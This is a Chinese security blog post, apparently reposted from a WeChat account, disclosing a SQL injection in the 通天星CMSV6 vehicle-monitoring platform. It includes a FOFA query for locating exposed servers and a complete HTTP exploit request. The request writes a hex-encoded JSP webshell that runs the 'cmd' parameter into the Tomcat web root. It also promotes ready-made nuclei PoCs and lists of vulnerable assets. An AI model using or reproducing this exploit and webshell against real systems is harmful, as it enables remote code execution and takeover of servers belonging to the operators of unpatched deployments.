通天星CMSV6 merge SQL注入漏洞

admin 2024年7月2日11:15:23评论17 views字数 1582阅读5分16秒阅读模式

 

漏洞简介

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G14G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行,获取服务器权限。

通天星CMSV6 merge SQL注入漏洞

影响版本

全版本

资产测绘

fofa:body="/808gps/"

通天星CMSV6 merge SQL注入漏洞

关注公众号:"simple学安全",回复20240702POC即可获取nuclei形式的POC以及fofa语句查询后的资产。

漏洞poc

POST /point_manage/merge HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2882.93 Safari/537.36Connection: closeContent-Length: 853Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipid=1&name=1' UNION SELECT%0aNULL, 0x3c25206a6176612e696f2e496e70757453747265616d20696e203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229292e676574496e70757453747265616d28293b696e742061203d202d313b627974655b5d2062203d206e657720627974655b323034385d3b6f75742e7072696e7428223c7072653e22293b7768696c652828613d696e2e7265616428622929213d2d31297b6f75742e7072696e746c6e286e657720537472696e6728622c302c6129293b7d6f75742e7072696e7428223c2f7072653e22293b6e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b253e,NULL,NULL,NULL,NULL,NULL,NULL INTO dumpfile '../../tomcat/webapps/gpsweb/test.jsp' FROM user_session a WHERE '1 '='1 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_time=8

利用成功会在根目录写入一个test.jsp木马,读取GET请求方式的cmd参数作为命令执行:

通天星CMSV6 merge SQL注入漏洞

通天星CMSV6 merge SQL注入漏洞

通天星CMSV6 merge SQL注入漏洞

关注公众号:"simple学安全",回复20240702POC即可获取nuclei形式的POC以及fofa语句查询后的资产。

原文始发于微信公众号(simple学安全):1day|通天星CMSV6 merge SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月2日11:15:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通天星CMSV6 merge SQL注入漏洞http://cn-sec.com/archives/2908903.html

发表评论

匿名网友 填写信息